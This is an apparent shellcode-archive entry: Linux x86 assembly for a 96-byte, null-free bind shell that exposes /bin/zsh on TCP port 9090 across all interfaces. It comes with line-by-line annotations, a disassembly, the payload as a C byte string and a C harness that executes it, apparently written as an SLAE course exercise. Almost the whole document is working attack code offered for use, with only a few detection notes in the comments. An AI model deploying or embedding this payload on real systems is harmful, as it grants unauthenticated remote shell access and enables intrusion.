
Linux/x86 - zsh TCP Bind Shell Port 9090 (96 bytes)


Linux/zsh TCP Bind Shell Port 9090 (96 bytes) by thryb on 13-07-16

Code
/* 
 
;
; Linux x86
; Author:  thryb
; Date:    13-07-16
; Purpose: Bind /bin/zsh to TCP port 9090
; Size:    96 bytes
; ID:      SLAE-770
; Git:     https://www.github.com/thryb/SLAE-770
;
 
global _start
 
section .text
_start:
        ; Entry point of a flat Linux/i386 binary: no C runtime, never returns.
        ; Kernel ABI used throughout: eax = syscall number, ebx/ecx/edx = args,
        ; int 0x80. Every socket operation goes through socketcall(102):
        ; ebx = sub-call number, ecx = pointer to an int array holding that
        ; sub-call's arguments, which is assembled on the stack each time.
        ; Register roles: edi = listening socket (step 2 on), edx = copy of it
        ; (step 3 on), ebx = accepted client socket (step 5 on).
        ; Only 8-bit partial writes (al/bl/cl) are used so no instruction
        ; encodes a 0x00 byte; the registers are zeroed first so their upper
        ; bytes are known when the full register is consumed by the kernel.
        ; No return value is ever checked: a failed step falls through into
        ; the next syscall with whatever errno is left in eax.
        ; Host-visible behaviour, for detection: a socket bound to 0.0.0.0:9090,
        ; then an execve of /bin/zsh whose fds 0/1/2 are the accepted socket.

        xor eax, eax ; eax = 0
        xor ebx, ebx ; ebx = 0
        xor edx, edx ; edx = 0; reused unchanged as sin_addr in step 2
        xor edi, edi ; edi = 0; will receive the listening socket

        ; 1 - create socket
        ; socket(AF_INET, SOCK_STREAM, 0);
        ; #define SYS_SOCKET      1               // sys_socket(2) 

        push eax ; args[2] = 0 (protocol)
        mov al, 0x66 ; eax = 102 = sys_socketcall (upper bytes already 0)
        mov bl, 0x1 ; ebx = 1 = SYS_SOCKET
        push byte 0x1 ; args[1] = 1 = SOCK_STREAM
        push byte 0x2 ; args[0] = 2 = AF_INET
        mov ecx, esp ; ecx = &args = {2, 1, 0}
        int 0x80 ; eax = listening socket fd (negative errno on failure, unchecked)

        ; 2 - Bind port
        ; bind(fd, (struct sockaddr *) &s_addr, 16);
        ; #define SYS_BIND        2               // sys_bind(2)

        xchg edi, eax ; edi = listening fd; eax = 0 (edi was zeroed above)
        mov al, 0x66 ; eax = 102 = sys_socketcall
        pop ebx ; ebx = 2: the AF_INET value left on the stack doubles as SYS_BIND
        pop esi  ; discard the leftover SOCK_STREAM (1); esi itself is never used
        push edx ; sin_addr = 0 = INADDR_ANY -> listens on every interface
        push word 0x8223 ; sin_port = 0x2382 in network byte order = 9090
        push word bx ; sin_family = 2 = AF_INET; struct sockaddr_in now starts at esp
        ; sin_zero is the protocol 0 pushed in step 1 plus 4 bytes of whatever
        ; lay below it on entry -- presumably ignored by the kernel; verify if reused.
        push byte 16 ; args[2] = sizeof(struct sockaddr_in)
        push ecx ; args[1] = &sockaddr: ecx still holds the esp of step 1, and the
                 ; two pops / three pushes above put esp back at exactly that address
        push edi ; args[0] = listening fd
        mov ecx, esp ; ecx = &args = {fd, &sockaddr, 16}
        int 0x80 ; bind(); return value unchecked

        ; 3 - Listen
        ; listen(fd, 1);
        ; #define SYS_LISTEN      4               // sys_listen(2) 

        pop edx ; edx = listening fd; the slot at ecx still contains it
        mov al, 0x66 ; eax = 102 = sys_socketcall
        add bl, 0x2 ; ebx = 2 + 2 = 4 = SYS_LISTEN
        int 0x80 ; listen(args[0], args[1]) with ecx still pointing at the bind()
                 ; array: the backlog is the stale &sockaddr value, not literally 1
                 ; as the C line above suggests -- presumably clamped by the kernel

        ; 4 - Accept
        ; accept(fd, NULL, NULL);
        ; #define SYS_ACCEPT      5               // sys_accept(2) 

        push eax ; args[2] = NULL (eax == 0 after a successful listen) -> addrlen
        push eax ; args[1] = NULL -> addr
        mov al, 0x66 ; eax = 102 = sys_socketcall
        inc ebx ; ebx = 4 + 1 = 5 = SYS_ACCEPT
        push edx ; args[0] = listening fd
        mov ecx, esp ; ecx = &args = {fd, NULL, NULL}
        int 0x80 ; blocks until a client connects; eax = accepted client fd

        ; 5 - dup
        ; sys_dup2 = 63 = 0x3f

        xchg eax, ebx   ; ebx = client fd (dup2 oldfd); eax = 5, overwritten below
        xor ecx, ecx    ; ecx = 0
        add cl, 0x2     ; ecx = 2 = STDERR; the loop counts down to 0 = STDIN

        dup2: ; dup2(client, 2); dup2(client, 1); dup2(client, 0)
                mov al, 0x3f    ; eax = 63 = sys_dup2 (upper bytes 0: the previous
                                ; return value was 5 or a newfd <= 2)
                int 0x80        ; dup2(ebx, ecx); returns ecx on success
                dec cl          ; next lower fd; 0 -> 0xff sets SF and ends the loop
                jns dup2        ; loop while cl >= 0, i.e. for 2, 1, 0

        ; 6 - execve /bin/zsh
        ; normal execve shell exec

        push eax ; eax == 0 here (dup2(client, 0) returned 0 on success): NUL terminator
        push 0x68737a2f ; "/zsh" (little-endian)
        push 0x6e69622f ; "/bin" -> the string "/bin/zsh\0" now starts at esp

        mov ebx, esp ; ebx = filename = "/bin/zsh"

        push eax ; NULL
        mov edx, esp ; edx = envp = {NULL}

        push ebx ; &"/bin/zsh"
        mov ecx, esp ; ecx = argv = {"/bin/zsh", NULL}

        mov al, 0xb     ; eax = 11 = sys_execve (upper bytes 0)
        int 0x80        ; execve("/bin/zsh", argv, envp) with stdio on the socket;
                        ; does not return on success, falls off the end on failure
 
============================================================================================================
 
No NULL bytes (disassembly of the assembled binary, for verification):
 
./bind-sh-tcp-9090:     file format elf32-i386
 
 
Disassembly of section .text:
 
08048060 <_start>:
 8048060:       31 c0                   xor    %eax,%eax
 8048062:       31 db                   xor    %ebx,%ebx
 8048064:       31 d2                   xor    %edx,%edx
 8048066:       31 ff                   xor    %edi,%edi
 8048068:       50                      push   %eax
 8048069:       b0 66                   mov    $0x66,%al
 804806b:       b3 01                   mov    $0x1,%bl
 804806d:       6a 01                   push   $0x1
 804806f:       6a 02                   push   $0x2
 8048071:       89 e1                   mov    %esp,%ecx
 8048073:       cd 80                   int    $0x80
 8048075:       97                      xchg   %eax,%edi
 8048076:       b0 66                   mov    $0x66,%al
 8048078:       5b                      pop    %ebx
 8048079:       5e                      pop    %esi
 804807a:       52                      push   %edx
 804807b:       66 68 23 82             pushw  $0x8223
 804807f:       66 53                   push   %bx
 8048081:       6a 10                   push   $0x10
 8048083:       51                      push   %ecx
 8048084:       57                      push   %edi
 8048085:       89 e1                   mov    %esp,%ecx
 8048087:       cd 80                   int    $0x80
 8048089:       5a                      pop    %edx
 804808a:       b0 66                   mov    $0x66,%al
 804808c:       80 c3 02                add    $0x2,%bl
 804808f:       cd 80                   int    $0x80
 8048091:       50                      push   %eax
 8048092:       50                      push   %eax
 8048093:       b0 66                   mov    $0x66,%al
 8048095:       43                      inc    %ebx
 8048096:       52                      push   %edx
 8048097:       89 e1                   mov    %esp,%ecx
 8048099:       cd 80                   int    $0x80
 804809b:       93                      xchg   %eax,%ebx
 804809c:       31 c9                   xor    %ecx,%ecx
 804809e:       80 c1 02                add    $0x2,%cl
 
080480a1 <dup2>:
 80480a1:       b0 3f                   mov    $0x3f,%al
 80480a3:       cd 80                   int    $0x80
 80480a5:       fe c9                   dec    %cl
 80480a7:       79 f8                   jns    80480a1 <dup2>
 80480a9:       50                      push   %eax
 80480aa:       68 2f 7a 73 68          push   $0x68737a2f
 80480af:       68 2f 62 69 6e          push   $0x6e69622f
 80480b4:       89 e3                   mov    %esp,%ebx
 80480b6:       50                      push   %eax
 80480b7:       89 e2                   mov    %esp,%edx
 80480b9:       53                      push   %ebx
 80480ba:       89 e1                   mov    %esp,%ecx
 80480bc:       b0 0b                   mov    $0xb,%al
 80480be:       cd 80                   int    $0x80
 
 
*/
 
#include<stdio.h>
#include<string.h>
 
/* The assembled bytes of _start from the listing above (96 bytes, none 0x00,
   so strlen() reports the full length). Adjacent string literals concatenate;
   the two bytes between the Port markers are sin_port in network byte order:
   0x23 0x82 = 0x2382 = 9090. */
unsigned char code[] = \
"\x31\xc0\x31\xdb\x31\xd2\x31\xff\x50\xb0\x66\xb3\x01\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x97\xb0\x66\x5b\x5e\x52\x66\x68"
// ==== Port ====
"\x23\x82"
// ==============
"\x66\x53\x6a\x10\x51\x57\x89\xe1\xcd\x80\x5a\xb0\x66\x80\xc3\x02\xcd\x80\x50\x50\xb0\x66\x43\x52\x89\xe1\xcd\x80\x93\x31\xc9\x80\xc1\x02\xb0\x3f\xcd\x80\xfe\xc9\x79\xf8\x50\x68\x2f\x7a\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
 
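/* Test harness: prints the length of code[] and then jumps into it.
 * Fixes over the original: an explicit `int main(void)` (implicit int is
 * not valid C99+) and `%zu` for the size_t that strlen() returns, which
 * `%d` mismatched. Returns 0 only if the jump ever comes back. */
int main(void)
{

    /* strlen() doubles as the NUL-byte check: any 0x00 inside code[] would
       truncate the reported length (the header above expects 96). */
    printf("Shellcode Length:  %zu\n", strlen(code));

    /* Casting a data pointer to a function pointer is not portable ISO C,
       and the page holding code[] must be mapped executable for the call
       to proceed; the toolchain's default W^X mapping blocks it. */
    int (*ret)(void) = (int (*)(void))code;

    ret();

    return 0;
}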
